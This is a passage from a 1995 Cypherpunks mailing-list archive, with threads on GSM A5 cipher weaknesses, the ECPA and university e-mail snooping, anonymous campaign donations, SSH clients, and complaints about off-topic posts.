SIGNATURE----- Version: 2.6.2i iQCVAwUBMNOcVixV6mvvBgf5AQGrkwQAnyNO9i+U470nlTcjJbu6lTQUNw+8b24L 2rZC/niE0WV9xFXYEQHA8cmFJrpLqp8OcfxZVLU+aYJ6sD2z3ehM5nlT7yoSTxXk /GSp1DgW8rfu19Ovf7xAe6CBt7/NNo/WNsd6pTev648Dj3tdNBCkqf8IlSu/22qa FgvShjjz8+Q= =6ZDm -----END PGP SIGNATURE----- From attila at primenet.com Sun Dec 17 14:24:52 1995 From: attila at primenet.com (attila) Date: Sun, 17 Dec 95 14:24:52 PST Subject: BosniaLINK (and other unnecessary posts) In-Reply-To: <199512171340.OAA14680@utopia.hacktic.nl> Message-ID: attila sez: it seems unreasonable to stifle all of the associated political posturing and infomercials from our "only natural criminal class" [Mark Twain], but I took 10 days of the full list and ran it through some of text processing and retrieval routines --80% of the characters delivered contain _only_ policy arguments, and another 10% are more or less off the mark. No one has time to monitor (moderate) the list to reduce this load --are we ready to turn that job over to hardwire analysis? [I see little value in AI in this case, but I'm sure some will disagree .] Let's put it this way: if we were a radio or television station, they'd pull the plug for our static or white snow.... procmail gets rid of Dr. Fred, or even the mention of Dr. Fred, but is not intelligent enough to sort for the presence of key words from either side of the fence (you must pass it if there are technical references even though Bubbha appears in the text). I have more than adequate text retrieval and text syntactic routines --is that where we are headed? On Sun, 17 Dec 1995, Anonymous wrote: > > URL: http://www.dtic.dla.mil/bosnia/ > > BosniaLINK Banner > > Welcome to BosniaLINK, the official Department of Defense > information > system about U.S. military activities in Operation JOINT > ENDEAVOR, the > NATO peacekeeping mission in Bosnia. This system is provided > by the > Office of the Assistant to the Secretary of Defense for > Public > Affairs. All information in BosniaLINK is publicly released > information from the U.S. government or NATO headquarters. > > BosniaLINK contains operation maps, fact sheets, news > releases, > biographies of key commanders and leaders, and transcripts > of > briefings, speeches and testimony. It is also hyperlinked to > the NATO > and State Department information services. > > > > _________________________________________________________________ > > > Contents > > * Maps (Dec 8) > * Fact Sheets (Dec 12) > * News Releases (Dec 15) > * Photos (Dec 15) > * Biographies of Key Commanders and Leaders (Dec 15) > * Transcripts of Briefings (Dec 15) > * Speeches and Testimony (Dec 15) > > > > _________________________________________________________________ > > > > > RELATED SITES FOR BOSNIA INFORMATION > > Air Force Role in Bosnia > NATO > U.S. State Department: U.S. Policy on Bosnia > Navy News Service: Bosnia Operations > > > > > _________________________________________________________________ > > > BosniaLINK is provided through the cooperative efforts of > the Office > of The Assistant to the Secretary of Defense (Public > Affairs), and the > Defense Technical Information Center. This is a government > computer > system. > > > > _________________________________________________________________ > > > DefenseLINK Home > > From Piete.Brooks at cl.cam.ac.uk Sun Dec 17 14:33:43 1995 From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks) Date: Sun, 17 Dec 95 14:33:43 PST Subject: Motorola Secure Phone In-Reply-To: <199512171141.NAA02997@trance.olari.clinet.fi> Message-ID: > I got the following from mjos at math.jyu.fi a couple of months ago. > Unfortunately I was unable to attend or listen on mbone. Does anyone > know more about this? Yes -- we have analogue A/V on a VHS cassette, digital MBone recording on M/O, and an abstract ... see below. >> University of Cambridge Computer Laboratory >> SEMINAR SERIES >> 10th October Bill Chambers, King's College, London >> PROBLEMS OF STREAM CIPHER GENERATORS WITH MUTUAL CLOCK CONTROL >> GSM:n salausalgoritmi on juuri tuota tyyppi�. Chambers yritti pit�� tuota >> nimenomaista esitelm�� jo yli vuosi sitten, mutta silloin viralliset tahot >> puuttuivat asiaan ja esitys peruttiin. H�n on l�yt�nyt algoritmista aukkoja, >> joiden avulla purkuaika saadaan eritt�in lyhyeksi. >> ps. ne meist�, jotka p��sev�t mboneen k�siksi, voivat seurata tapahtumia >> liven� :) > [Free translation: The GSM encryption algorithm is of exactly that > type. Chambers tried to have this particular presentation over an > year ago, but at that time the official side interfered and the > presentation was cancelled. He has found holes in the algorithm that > can be used to make decryption (without key) very quick. > PS. Those of us who can get access to mbone, can follow it live.] Security Group Seminar, 10th October 1995

Security Group Seminar, 10th October 1995


Speaker:
Bill Chambers, King's College, University of London

Date:
Tuesday 10th October

Place:
Room TP4, Computer Laboratory

Title:
PROBLEMS OF STREAM CIPHER GENERATORS WITH MUTUAL CLOCK CONTROL

The speaker has been looking at the cycle structure of an algorithm posted just over a year ago on the Internet and alleged to be the secret A5 algorithm used for confidentiality in the GSM mobile telephone system. This algorithm employs three mutually clock-controlled shift registers, and can fairly quickly enter a loop with what is essentially the shortest possible period, a number very small compared with the total number of states, or even its square root. Moreover this behaviour is robust, not being influenced by factors such as choice of primitive feedback polynomial or even clocking logic (with a proviso to be discussed). A fairly straightforward explanation for this behaviour has been found. Some ways of getting around the problem of excessively short periods are considered, as well as the behaviour of systems with different numbers of mutually clocked registers. In particular a mention is made of the wartime T52e cipher, perhaps the inspiration for "alleged A5".

From rah at shipwright.com Sun Dec 17 01:51:04 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 17 Dec 1995 17:51:04 +0800 Subject: (fwd) Showdown over e-cash Message-ID: --- begin forwarded text X-Sender: dmk at zp.tempo.att.com Mime-Version: 1.0 Date: Sat, 16 Dec 1995 20:27:29 -0500 To: www-buyinfo at allegra.att.com From: allegra!dmk at uunet.uu.net (Dave Kristol) Subject: Showdown over e-cash Take a look at the article by that title at http://www.upside.com/resource/print/9601/ecash.html It's a provocative and rather breathless account of the forthcoming demise of banks as we know them, brought on by electronic transactions. Dave Kristol --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From ncognito at gate.net Sun Dec 17 02:37:47 1995 From: ncognito at gate.net (Ben Holiday) Date: Sun, 17 Dec 1995 18:37:47 +0800 Subject: Secured RM ? (source) In-Reply-To: <199512170428.PAA22362@sweeney.cs.monash.edu.au> Message-ID: On Sun, 17 Dec 1995, Jiri Baum wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > There's no automatic rm that will also delete all backups of the file. > (You are keeping backups, aren't you?) > In this particular case what im concerned about is a temporary cleartext copy of a permanently encrypted document. The cleartext only exists for about 1-4 seconds, and then is deleted, so backups arent really a problem.. From dsmith at midwest.net Sun Dec 17 18:43:47 1995 From: dsmith at midwest.net (David E. Smith) Date: Sun, 17 Dec 95 18:43:47 PST Subject: Motorola Secure Phone Message-ID: <199512180304.VAA12327@cdale1.midwest.net> At 04:34 PM 12/15/95 -0800, you wrote: > My AT&T 900 (or is it 9000?) MHz digital cordless phone says >the same thing. I figure it uses a weak cryptosystem. There is >something about key setup when you return the handset to the base. > (The phone was $200, FWIW) That just refers to the fact that it is no longer legal to sell scanners that can listen in to that range. The same is true of the 800 MHz band (used for a lot of cellular phone traffic). Ah, I love my really old scanner that isn't bound by such limitations... (BTW, a couple of years ago Nuts & Volts ran an article with information on a program and some toys that let a laptop computer, properly wired into a cell phone, act as a cell scanner. Never did wire it up, but it looked like fun ;) ObCrypto: um, if you can find it, let me know :) ----- David E. Smith, c/o Southeast Missouri State University 1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814 PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/ Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864Quote: "If I wanted thrills and danger and lots of rampant violence, I coulda been a postal worker!" -- Ben, "Sensational Spider-Man" From rick at muskoka.net Sun Dec 17 19:17:32 1995 From: rick at muskoka.net (Richard D. Sheffar) Date: Sun, 17 Dec 95 19:17:32 PST Subject: BIO-MUNITION: gifs of perl-RSA tattoo In-Reply-To: <730.9512122013@exe.dcs.exeter.ac.uk> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 12 Dec 1995 aba at atlas.ex.ac.uk wrote: > > People have been reading the list for a while will be familiar with > this piece of perl code used as a non-exportable, supposedly ITAR > controlled .sig: > > > #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL > $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa > 2/d0 pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2) > Okay, I admit it I don't know everything. What does the perl script actually do. I saved to file, chmod 777 perly tried running the script and kept getting error line 3. What does it do, does it encrypt a file or what. What Have i done wrong? -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: PGP Signed with PineSign 2.2 iQBVAgUBMNTcedZnjIiISvIVAQF7IwH7BufPIuyXuJy6LJOsUnxJYIzv7GAly4FL OWL8xHaKZb/7Ltepmeyd988TM+3DAmIDzEW2EdX5Nwia8Scst3TnoA== =/gW7 -----END PGP SIGNATURE----- Please report any Strange behaviour by the Mail Monster to rick at muskoka.net ****************************************************************************** send mail w/ subject 'send help', To get Commands accepted by Mail Monster. rick at muskoka.net rick.sheffar at primetime.org PGP encrypted mail accepted and preferred! PGP key ID 0x884af215 PGP key finger print = 01 49 EA C6 42 90 21 02 9D CB 19 7E E3 23 66 58 ****************************************************************************** From ylo at cs.hut.fi Sun Dec 17 03:25:19 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Sun, 17 Dec 1995 19:25:19 +0800 Subject: Encrypted telnet... In-Reply-To: <9512151848.AA20590@spirit.aud.alcatel.com> Message-ID: <199512170136.DAA02488@trance.olari.clinet.fi> > I am looking for an encrypted telnet (or rlogin/etc) package > that supports a Windoze client. > > It looks like all the normal ones that I can find > (SSH, SRA telnet, SSLtelnet, etc) are just under Unixoids. > Don't get me wrong - I would prefer to use Unix, but I am > headed off to locations, where I know all I'll have access to > is Windows, with a PPP stack to some ISP. A preliminary windows client for SSH was recently announced by Cedomir Igaly . I am also working on a windows client myself, and expect early beta versions to be available in early January, and an official version in late February. [For more information on ssh, see http://www.cs.hut.fi/ssh.] Tatu From jirib at sweeney.cs.monash.edu.au Sun Dec 17 04:36:03 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Sun, 17 Dec 1995 20:36:03 +0800 Subject: kocher's timing attack In-Reply-To: <199512150203.VAA00869@opine.cs.umass.edu> Message-ID: <199512170409.PAA22283@sweeney.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello cypherpunks at toad.com (Cypherpunks Mailing List) and futplex at pseudonym.com (Futplex) Futplex writes: ... [in reply to others] ... > You are overlooking the main point that this is a _timing_ attack. Unless ... > Just beware of > people with extremely precise stopwatches at key signing parties ;> Hold on, you *never* sign directly at key signing parties! Never take your key where: - it could be stolen - you suspect others may wish to influence your signing - somebody might spy your passphrase (hidden cameras in ceiling) You take fingerprints, and sign when you get back home. Re the timing subject, do you think it'd make a good party trick? * Think of a number between 20 and 30. * for 4-5 numbers a, "Multiply the orignal number by " * the number you are thinking of is Now, anybody have statistics for mental arithmetic? Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMNOXuyxV6mvvBgf5AQFEtgP/Wf5I205BAuqiuSEwkslbGP0nwV8ylA0G nnmS1FFJjFkkfICxEp+/C0iQqLcYpp1ytio+yyWmAE+nDEomcmnQb40ElGjYB/2m btP6cT9ozfM8lXY6Tfn+G+kduZWfpKyngoMDSPzYSNAuizD5qyUodYJXyjfz4y0p BoXBMwB9IUA= =EpU4 -----END PGP SIGNATURE----- From holovacs at styx.ios.com Sun Dec 17 07:18:24 1995 From: holovacs at styx.ios.com (Jay Holovacs) Date: Sun, 17 Dec 1995 23:18:24 +0800 Subject: Is ths legal?... (fwd) Message-ID: On Sun, 17 Dec 1995, Declan B. McCullagh wrote: > Exactly. If Oklahoma University is private, it can establish and enforce > policies that would be unconstitutional at public schools. Those > policies become part of the contract and a student must abide by them, > except when they are administered arbitrarily and capriciously. At a > public universities, students probably would have more freedom to > challenge this policy. Think about this principle in light of the current political climate toward "privatization." Moves to privatize schools, prisons, even police forces in a few communities. Sounds like a good way around all those constitutional protections. > A recent article from the school's student newspaper says: > > "In the third part, the policy states that the university reserves the > right of access to user e-mail... It seems to me that there is some legal status to email established by Congress in the late '80s, especially that which comes in from outside with 'some expectation' of privacy. I've got to rummage around for the details however. Jay Holovacs PGP Key fingerprint = AC 29 C8 7A E4 2D 07 27 AE CA 99 4A F6 59 87 90 (KEY id 1024/80E4AA05) email for key From holovacs at styx.ios.com Sun Dec 17 07:22:38 1995 From: holovacs at styx.ios.com (Jay Holovacs) Date: Sun, 17 Dec 1995 23:22:38 +0800 Subject: Is ths legal?.. (fwd) Message-ID: This is the reference I couldn't find for my previous post. It would seem to have some relevance here Electronic Communications Privacy Act of 1986 (ECPA) (18 U.S.C. ss 2510 et seq.). "It shall not be unlawful under this chapter for an operator of a switchboard, or an officer, employee, or agent of a provider of wire *or electronic* communication service, whose facilities are used in the trans- mission of a wire communication, to intercept, disclose, or use that communication in the normal course of his employment while engaged in any activity which is a necessary incident to the rendition of his service or to the protection of the rights or property of the provider of that service, except that a provider of wire communication service to the public shall not utilize service observing or random monitoring except for mechanical or service quality control checks." 18 USC section 2510(2)(a)(i). Doesn't seem to leave much room for snooping on contents of messages. Jay Holovacs PGP Key fingerprint = AC 29 C8 7A E4 2D 07 27 AE CA 99 4A F6 59 87 90 (KEY id 1024/80E4AA05) email me for key From unicorn at schloss.li Sun Dec 17 07:50:30 1995 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 17 Dec 1995 23:50:30 +0800 Subject: Is ths legal?.. (fwd) In-Reply-To: Message-ID: On Sun, 17 Dec 1995, Jay Holovacs wrote: > > > This is the reference I couldn't find for my previous post. It would seem > to have some relevance here > > Electronic Communications Privacy Act of 1986 (ECPA) (18 U.S.C. ss 2510 > et seq.). "It shall not be unlawful under this chapter for an operator of > a switchboard, or an officer, employee, or agent of a provider of wire *or > electronic* communication service, whose facilities are used in the trans- > mission of a wire communication, to intercept, disclose, or use that > communication in the normal course of his employment while engaged in any > activity which is a necessary incident to the rendition of his service or > to the protection of the rights or property of the provider of that > service, except that a provider of wire communication service to the > public shall not utilize service observing or random monitoring except for > mechanical or service quality control checks." 18 USC section > 2510(2)(a)(i). > > Doesn't seem to leave much room for snooping on contents of messages. I disagree. Instead it implies that interception and administrative review of content will be tolerated where it is "a necessary incident to the rendition of his service or to the protection of the rights or property of the provider of that service." Note that it will be the provider who makes the definition in the ex ante application. Even worse, the protection that is given is for "a provider of wire communication service to the public." I would be very surprised if, 1> "provider" was anything but a narrowly drawn definition, 2> provider to the public is not specifically narrowed as well. > Jay Holovacs > PGP Key fingerprint = AC 29 C8 7A E4 2D 07 27 AE CA 99 4A F6 59 87 90 > (KEY id 1024/80E4AA05) email me for key > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From nobody at REPLAY.COM Sun Dec 17 07:59:20 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 17 Dec 1995 23:59:20 +0800 Subject: BosniaLINK Message-ID: <199512171340.OAA14680@utopia.hacktic.nl> URL: http://www.dtic.dla.mil/bosnia/ BosniaLINK Banner Welcome to BosniaLINK, the official Department of Defense information system about U.S. military activities in Operation JOINT ENDEAVOR, the NATO peacekeeping mission in Bosnia. This system is provided by the Office of the Assistant to the Secretary of Defense for Public Affairs. All information in BosniaLINK is publicly released information from the U.S. government or NATO headquarters. BosniaLINK contains operation maps, fact sheets, news releases, biographies of key commanders and leaders, and transcripts of briefings, speeches and testimony. It is also hyperlinked to the NATO and State Department information services. _________________________________________________________________ Contents * Maps (Dec 8) * Fact Sheets (Dec 12) * News Releases (Dec 15) * Photos (Dec 15) * Biographies of Key Commanders and Leaders (Dec 15) * Transcripts of Briefings (Dec 15) * Speeches and Testimony (Dec 15) _________________________________________________________________ RELATED SITES FOR BOSNIA INFORMATION Air Force Role in Bosnia NATO U.S. State Department: U.S. Policy on Bosnia Navy News Service: Bosnia Operations _________________________________________________________________ BosniaLINK is provided through the cooperative efforts of the Office of The Assistant to the Secretary of Defense (Public Affairs), and the Defense Technical Information Center. This is a government computer system. _________________________________________________________________ DefenseLINK Home From holovacs at styx.ios.com Sun Dec 17 08:02:45 1995 From: holovacs at styx.ios.com (Jay Holovacs) Date: Mon, 18 Dec 1995 00:02:45 +0800 Subject: Is ths legal?.. (fwd) In-Reply-To: Message-ID: On Sun, 17 Dec 1995, Black Unicorn wrote: > > I disagree. Instead it implies that interception and administrative > review of content will be tolerated where it is "a necessary incident to > the rendition of his service or to the protection of the rights or > property of the provider of that service." Note that it will be the > provider who makes the definition in the ex ante application. > The provider is allowed access ONLY for QC purposes. Getting back to thhe original point, the provider's ability to interpret the contents of the message is in no way required to monitor the system and cannot be used as a justification in itself for prohibiting use of crypto. Also, what if someone outside the system emails encrypted messages to the user. What authority would the sys admin have there?? Jay Holovacs PGP Key fingerprint = AC 29 C8 7A E4 2D 07 27 AE CA 99 4A F6 59 87 90 (KEY id 1024/80E4AA05) email for key From perry at piermont.com Sun Dec 17 10:12:24 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 18 Dec 1995 02:12:24 +0800 Subject: BosniaLINK In-Reply-To: <199512171340.OAA14680@utopia.hacktic.nl> Message-ID: <199512171747.MAA06815@jekyll.piermont.com> What I want to know is this: why the hell do you think this is interesting to cypherpunks, and why do people like you continue to post random URLs, news stories, etc, that have nothing to do with cryptography, privacy, or anything else remotely discussed on this mailing list, even though lots of people repeatedly state that it isn't desired? Are you an NSA operative attempting to reduce our effectiveness, or just from a drug company hoping to raise our blood pressure? .pm Anonymous writes: > > URL: http://www.dtic.dla.mil/bosnia/ > > BosniaLINK Banner > > Welcome to BosniaLINK, the official Department of Defense > information From unicorn at schloss.li Sun Dec 17 11:54:49 1995 From: unicorn at schloss.li (Black Unicorn) Date: Mon, 18 Dec 1995 03:54:49 +0800 Subject: Is ths legal?... In-Reply-To: Message-ID: On Sat, 16 Dec 1995, Robert A. Hayden wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > On Sat, 16 Dec 1995, tallpaul wrote: > > > Second, if it is true, people frequently define the ability to do something > > as a "privledge" not a "right." As in a hypothetical "Use of student > > accounts at O.U. is a privledge extended to the students by the University. > > By using our computer you keep to our rules, including abandoning any > > notion you might have that your communications are in any way private" etc. > > etc. > > I believe there is a supreme court case that essentially says that a > public entity cannot define something as either privledge or right. I this ruling would prevent the Supreme Court from defining something as a privledge or right. It would also pose this limitation on states, as they are public entities, and thus driver's licenses cannot be defined as one or the other, which as we all very well know, they are. I'm > not sure the name, but the EFF has an abstract available. > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > Comment: PGP Signed with PineSign 2.2 > > iQCVAwUBMNN6WjokqlyVGmCFAQG6BwQAqqJhzk7BzJ+9Gmbl8Esf+8zcxVzEfAw+ > GgPr8AMNz0KzgkOHDZsQOwqFM5wVqkpk8bzSUTCHu5YW8/ORfXHB7b/lmn03qkBd > ZZFEldfhoZFINfm4tdAd/8YfWF0WZeXiuDsRqJA/V4iRyIRj9+axpUPOFefDqkMD > gQR8KyPuSrw= > =Wagv > -----END PGP SIGNATURE----- > > ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu > \ /__ Finger for Geek Code Info <=> Finger for PGP Public Key > \/ / -=-=-=-=-=- -=-=-=-=-=- > \/ http://krypton.mankato.msus.edu/~hayden/Welcome.html > > -----BEGIN GEEK CODE BLOCK----- > Version: 3.1 > GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+ > K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++ > R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+** > ------END GEEK CODE BLOCK------ > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jimbell at pacifier.com Sun Dec 17 11:55:57 1995 From: jimbell at pacifier.com (jim bell) Date: Mon, 18 Dec 1995 03:55:57 +0800 Subject: Political Cleanup program Message-ID: Politics is traditionally corrupt, it appears, because donors to politicians and political campaigns expect a quid pro quo for their donations. Various unsatisfactory solutions include campaign spending limits, etc. It occurs to me that it would be a major advance if a system could be set up that would "blind" campaign donations as to their source: The donor could be satisfied that his donation gets to the candidate or cause, but the candidate couldn't know who actually paid the money (and the donor would be unable to prove that he made a donation, for example). Admittedly there are a lot of details that need to be worked out, but if this could be accomplished it would change politics as we know it. From declan+ at CMU.EDU Sun Dec 17 11:56:02 1995 From: declan+ at CMU.EDU (Declan B. McCullagh) Date: Mon, 18 Dec 1995 03:56:02 +0800 Subject: Is ths legal?... In-Reply-To: <199512170131.UAA03707@pipe6.nyc.pipeline.com> Message-ID: Excerpts from internet.cypherpunks: 16-Dec-95 Re: Is ths legal?... by tallpaul at pipeline.com > Second, if it is true, people frequently define the ability to do something > as a "privledge" not a "right." As in a hypothetical "Use of student > accounts at O.U. is a privledge extended to the students by the University. > By using our computer you keep to our rules, including abandoning any > notion you might have that your communications are in any way private" etc. > etc. Exactly. If Oklahoma University is private, it can establish and enforce policies that would be unconstitutional at public schools. Those policies become part of the contract and a student must abide by them, except when they are administered arbitrarily and capriciously. At a public universities, students probably would have more freedom to challenge this policy. A recent article from the school's student newspaper says: "In the third part, the policy states that the university reserves the right of access to user e-mail... Personal passwords may not be used to prevent access. In the fourth part, the policy states that e-mail is neither private nor confidential. The fifth part states important documents should be saved in the computer or converted to hard copy." (http://www.uoknor.edu/okdaily/issues/fall1995/dec-7/1-email.processed.html) To me, "personal passwords" sounds like a student newspaper trying to say "encryption." I've copied this message to a grad student privacy advocate quoted in the article and to the student newspaper. Perhaps they can shed more light on the situation. The best way to work against totalitarian administrators is to shine a bright light on their repressive policies. -Declan From declan+ at CMU.EDU Sun Dec 17 12:31:23 1995 From: declan+ at CMU.EDU (Declan B. McCullagh) Date: Mon, 18 Dec 1995 04:31:23 +0800 Subject: Is ths legal?... In-Reply-To: Message-ID: Disclaimer: I'm not a lawyer. Harvey is. (And a pretty damn good one, too.) -Declan ---------- Forwarded message begins here ---------- Date: Sun, 17 Dec 1995 14:38:24 +0001 (EST) From: Harvey A Silverglate Subject: Re: Is ths legal?... To: "Declan B. McCullagh" In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Declan - The answer to the "is this legal?" question is more complex than simply "private versus public" university. There are fairly strict federal anti-wiretapping laws. It is hardly clear that a private university may eavesdrop on students' phone or computer conversations, even if conducted over the university's network. Furthermore, many states have their own anti-wiretap and anti-eavesdrop laws, which are even stricter than federal standards. I don't have the time nor the inclination to do research into Oklahoma law, but we did some research into this area of state and federal law for the LaMacchia case and concluded that in its investigation of David LaMacchia, MIT very well might have violated federal laws. Harvey Silverglate From rcooper at the-wire.com Sun Dec 17 12:41:53 1995 From: rcooper at the-wire.com (Russ Cooper) Date: Mon, 18 Dec 1995 04:41:53 +0800 Subject: Political Cleanup program Message-ID: <01BACC91.AB611320@rcooper.the-wire.com> A much simpler solution might be to just force all politicians to give up their campaign funds when they retire, or even better, immediately following the elections. Today, whatever is left in their campaign funds are given over to them when they retire or are forced out of office, on top of their lucrative pensions. Cheers, Russ From alano at teleport.com Sun Dec 17 13:04:25 1995 From: alano at teleport.com (Alan Olsen) Date: Mon, 18 Dec 1995 05:04:25 +0800 Subject: Political Cleanup program Message-ID: <2.2b7.32.19951217203129.0089fe34@mail.teleport.com> At 11:04 AM 12/17/95 -0800, you wrote: >It occurs to me that it would be a major advance if a system could be set up >that would "blind" campaign donations as to their source: The donor could >be satisfied that his donation gets to the candidate or cause, but the >candidate couldn't know who actually paid the money (and the donor would be >unable to prove that he made a donation, for example). Admittedly there are >a lot of details that need to be worked out, but if this could be >accomplished it would change politics as we know it. I think you would see alot less donations by the corporate powers that be and the favormongers. (Which is why such a system will probibly never come into existance.) It would be a good step in the right direction. However... I live in a state which just inacted a series of campaign reforms. The first thing the lobbyists did was find a way to exploit every loophole possible to get around that legislation. Such a system would have to be pretty tight and pretty specific. (And therefore will be fought against by almost every politician ansd lobbyiest on the planet.) The fundraising dinners will certainly have to go... > > > > > > > | Remember: Life is not always champagne. Sometimes it is REAL pain. | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - R. Rococo | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From jya at pipeline.com Mon Dec 18 05:54:49 1995 From: jya at pipeline.com (John Young) Date: Mon, 18 Dec 95 05:54:49 PST Subject: GLO_bul Message-ID: <199512181354.IAA29000@pipe1.nyc.pipeline.com> 12-18-95. NYPaper: "His Goal: Keeping the Web Worldwide." An adoration of selfless Tim Berners-Lee with a pan gloss of the World Wide Web Cartel. "From Mainframes to Global Networking." I.B.M.'s selfless strategy for Net supremacy, hand-in-hand with altruistic AT&T and eleemosynary Microsoft. GLO_bul (17kb) From unicorn at schloss.li Sun Dec 17 14:00:59 1995 From: unicorn at schloss.li (Black Unicorn) Date: Mon, 18 Dec 1995 06:00:59 +0800 Subject: Is ths legal?.. (fwd) In-Reply-To: Message-ID: On Sun, 17 Dec 1995, Jay Holovacs wrote: > > On Sun, 17 Dec 1995, Black Unicorn wrote: > > > > I disagree. Instead it implies that interception and administrative > > review of content will be tolerated where it is "a necessary incident to > > the rendition of his service or to the protection of the rights or > > property of the provider of that service." Note that it will be the > > provider who makes the definition in the ex ante application. > > > The provider is allowed access ONLY for QC purposes. This is only explicit with regards to public providers. Getting back to thhe > original point, the provider's ability to interpret the contents of the > message is in no way required to monitor the system and cannot be used as > a justification in itself for prohibiting use of crypto. Oh? What if I say that I need to monitor e-mail for data corruption? Also, you might consider the definition of "intercept." I suspect it's a bit wider than you are accounting for. > Also, what if someone outside the system emails encrypted messages to the > user. What authority would the sys admin have there?? Entirely unrelated to the statute you cite. > Jay Holovacs > PGP Key fingerprint = AC 29 C8 7A E4 2D 07 27 AE CA 99 4A F6 59 87 90 > (KEY id 1024/80E4AA05) email for key > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From alano at teleport.com Sun Dec 17 14:02:13 1995 From: alano at teleport.com (Alan Olsen) Date: Mon, 18 Dec 1995 06:02:13 +0800 Subject: Is ths legal?... Message-ID: <2.2b7.32.19951217205443.008a13f0@mail.teleport.com> At 04:18 AM 12/17/95 -0500, you wrote: >Exactly. If Oklahoma University is private, it can establish and enforce >policies that would be unconstitutional at public schools. Those >policies become part of the contract and a student must abide by them, >except when they are administered arbitrarily and capriciously. At a >public universities, students probably would have more freedom to >challenge this policy. In looking at their homepage, it appears to be a state funded school. (There is not alot of background on the school history or affiliations on their homepage except for a note that it was founded by the territorial legislature a number of years before becoming a state..) | What is the Eye in the Food Pyramid? | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | | From unicorn at schloss.li Sun Dec 17 14:20:24 1995 From: unicorn at schloss.li (Black Unicorn) Date: Mon, 18 Dec 1995 06:20:24 +0800 Subject: Political Cleanup program In-Reply-To: <01BACC91.AB611320@rcooper.the-wire.com> Message-ID: On Sun, 17 Dec 1995, Russ Cooper wrote: > A much simpler solution might be to just force all politicians to give up > their campaign funds when they retire, or even better, immediately > following the elections. Today, whatever is left in their campaign funds > are given over to them when they retire or are forced out of office, on top > of their lucrative pensions. UH....? > > Cheers, > Russ > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From hayden at krypton.mankato.msus.edu Sun Dec 17 16:22:34 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Mon, 18 Dec 1995 08:22:34 +0800 Subject: Is ths legal?... In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 17 Dec 1995, Black Unicorn wrote: > I this ruling would prevent the Supreme Court from defining > something as a privledge or right. > > It would also pose this limitation on states, as they are public > entities, and thus driver's licenses cannot be defined as one or the > other, which as we all very well know, they are. I am appending the file from the EFF that talks about the privledge/right distinction. There is a URL as part of the file. ========== =============== ftp://ftp.eff.org/pub/CAF/faq/just-a-privilege =============== q: If a state university calls computer or network access a "privilege", can they remove an individual's access arbitrarily? a: In most cases no. U.S. courts no longer recognize the wooden distinction between privileges and rights [Board of Regents v. Roth, 408 U.S. 564 (1972)]. One need only look at the Constitution to see that "privilege" is often used to mean something different than its informal use. The 14th Amendment says "No State shall make or enforce any law which shall abridge the privileges or immunities of citizens of the United States;". The Constitution also refers to the "privilege of the writ of habeas corpus", "privileges and immunities of citizens in the several States", and "privileged from arrest during their attendance at the session of their respective houses". In _Goss v. Lopez_, the Supreme Court said a "student's legitimate entitlement to a public education is a property interest which is protected by the Due Process Clause and .. may not be taken away for misconduct without adherence to the minimum procedures required by that Clause." The Court 